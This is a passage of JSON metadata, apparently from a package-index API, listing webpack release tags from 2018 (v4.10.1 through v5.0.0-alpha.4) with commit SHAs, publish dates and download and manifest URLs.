//github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0/manifests"},{"name":"v4.26.1","sha":"8e841feda3ef32c64df1a175d0d9f71e47cfbe8e","kind":"tag","published_at":"2018-11-25T20:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.1/manifests"},{"name":"v4.26.0","sha":"04f90c53eeae4817a9c515a0daca119d0decfa45","kind":"tag","published_at":"2018-11-19T08:39:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.26.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.26.0/manifests"},{"name":"v4.25.1","sha":"2361995a429794d372d61e3fb628dea3929e0ca4","kind":"tag","published_at":"2018-11-05T18:12:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.1/manifests"},{"name":"v4.25.0","sha":"290094e10a990aa3fd8073b02b4dc57781f924d7","kind":"tag","published_at":"2018-11-05T08:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.25.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.25.0/manifests"},{"name":"v4.24.0","sha":"9e397b5664dab3af0ceb2fa93cb5c539f02c023c","kind":"tag","published_at":"2018-11-02T12:11:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.24.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.24.0/manifests"},{"name":"v4.23.1","sha":"607cf70eddd213a690585276f7124963536781e7","kind":"tag","published_at":"2018-10-25T08:26:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.1/manifests"},{"name":"v4.23.0","sha":"a4feb6e15ff7ac19bab1a458de369a887dde44fe","kind":"tag","published_at":"2018-10-24T15:45:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.23.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.23.0/manifests"},{"name":"v4.22.0","sha":"894eca20bd678ca5473cfca28f332a7322c64b8e","kind":"tag","published_at":"2018-10-21T09:34:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.22.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.22.0/manifests"},{"name":"v4.21.0","sha":"432d2a3f174b08d5f4f7de018799c97a18efa1fd","kind":"tag","published_at":"2018-10-17T17:47:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.21.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.21.0/manifests"},{"name":"v4.20.2","sha":"5c5e902c8e89afeb51ad130f12a908b89d627fc5","kind":"tag","published_at":"2018-09-25T20:31:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.2/manifests"},{"name":"v4.20.1","sha":"91e9dd77062797e3e716485f295d32a5cab57042","kind":"tag","published_at":"2018-09-25T13:25:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.1/manifests"},{"name":"v4.20.0","sha":"c4d8a3c8d67239f6457fd7560d9bea14524ff4f0","kind":"tag","published_at":"2018-09-25T07:15:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.20.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.20.0/manifests"},{"name":"v4.19.1","sha":"b7121c15e1cc810ead6aa0f4b2aad4666c072257","kind":"tag","published_at":"2018-09-18T07:56:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.1/manifests"},{"name":"v4.19.0","sha":"6bf832398c3905e06300596caddb073c583d94c4","kind":"tag","published_at":"2018-09-13T22:04:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.19.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.19.0/manifests"},{"name":"v4.18.1","sha":"c51a1bab94e4ff8ffca443e4fcb038bc4911e65e","kind":"tag","published_at":"2018-09-13T10:22:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.1/manifests"},{"name":"v4.18.0","sha":"ee7d9485fa30d1d3d5adbfdfb52c8f57ae8b439e","kind":"tag","published_at":"2018-09-10T15:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.18.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.18.0/manifests"},{"name":"v4.17.3","sha":"ee27d36e7cb0bed3ca32911165bbf01fef993e48","kind":"tag","published_at":"2018-09-10T14:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.3/manifests"},{"name":"v4.17.2","sha":"dfe6379052598a00f13bfa4f34ac73856ddf3dd0","kind":"tag","published_at":"2018-09-03T17:25:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.2/manifests"},{"name":"v4.17.1","sha":"ff3ef5eb284ddcd3da8c3f5bef6318e873779ffe","kind":"tag","published_at":"2018-08-22T09:50:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.1/manifests"},{"name":"v4.17.0","sha":"6f1f18f84dee330ec582d4e9c075c47c9a732102","kind":"tag","published_at":"2018-08-21T08:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.17.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.17.0/manifests"},{"name":"v4.16.5","sha":"025338cc91a867768325120d325b341bdcdc4321","kind":"tag","published_at":"2018-08-06T07:13:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.5/manifests"},{"name":"v4.16.4","sha":"1e9d98cb4e52a6efc58f516aa7451d1faa6347ba","kind":"tag","published_at":"2018-08-02T13:46:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.4/manifests"},{"name":"v4.16.3","sha":"482ff200303e84a65bdd5c456ce232309a6ce450","kind":"tag","published_at":"2018-07-27T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.3/manifests"},{"name":"v4.16.2","sha":"0d4c87fcf261de02a6ecfb05faab235c5a2a92dc","kind":"tag","published_at":"2018-07-23T09:51:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.2/manifests"},{"name":"v4.16.1","sha":"fa02f3d03344913f0a02d29cb363581bc8535bef","kind":"tag","published_at":"2018-07-16T08:27:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.1/manifests"},{"name":"v4.16.0","sha":"18d33c630f799e99e5e43fc0b6931713dc976529","kind":"tag","published_at":"2018-07-11T08:45:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.16.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.16.0/manifests"},{"name":"v4.15.1","sha":"81149be5c1cd2a3ce70c3abcc179c5070fd6dd1c","kind":"tag","published_at":"2018-07-05T13:32:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.1/manifests"},{"name":"v4.15.0","sha":"bdd4442c449b41d2a0ea7ed0de9cded3ba0e2e31","kind":"tag","published_at":"2018-07-04T19:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.15.0/manifests"},{"name":"v4.14.0","sha":"190cf7b017c9d4106c83553a1de652e53452b095","kind":"tag","published_at":"2018-06-29T12:12:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.14.0/manifests"},{"name":"v4.13.0","sha":"e3678aa3767aaeb26ebcf5e3028412bbebdb4f9f","kind":"tag","published_at":"2018-06-28T15:34:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.13.0/manifests"},{"name":"v4.12.2","sha":"c384c3fb1c162667d001f467db05e73570ddd4d2","kind":"tag","published_at":"2018-06-27T05:39:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.2/manifests"},{"name":"v4.12.1","sha":"8a7597aa6eb2eef66a8f9db3a0c49bcb96022a94","kind":"tag","published_at":"2018-06-24T08:44:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.1/manifests"},{"name":"v4.12.0","sha":"02a955b4335cb7eeeb4dd1c96ef5407c6bcea158","kind":"tag","published_at":"2018-06-08T07:24:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.12.0/manifests"},{"name":"v4.11.1","sha":"956c0b12dcc274f5e5725fc5abc51f805d916f43","kind":"tag","published_at":"2018-06-06T07:02:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.1/manifests"},{"name":"v4.11.0","sha":"e2fe2009d9f2b26a8d751ea89e184d6ec96e37d7","kind":"tag","published_at":"2018-06-05T11:25:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.11.0/manifests"},{"name":"v4.10.2","sha":"b8266d09a9472344a4894f1d8cf4067eb452019c","kind":"tag","published_at":"2018-05-30T08:29:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.10.2/manifests"},{"name":"v4.10.1","sha":"b80296f0c8b3907a8c96e4146bfb21746346fbb0","kind":"tag","published_at":"2018-05-29T13:38: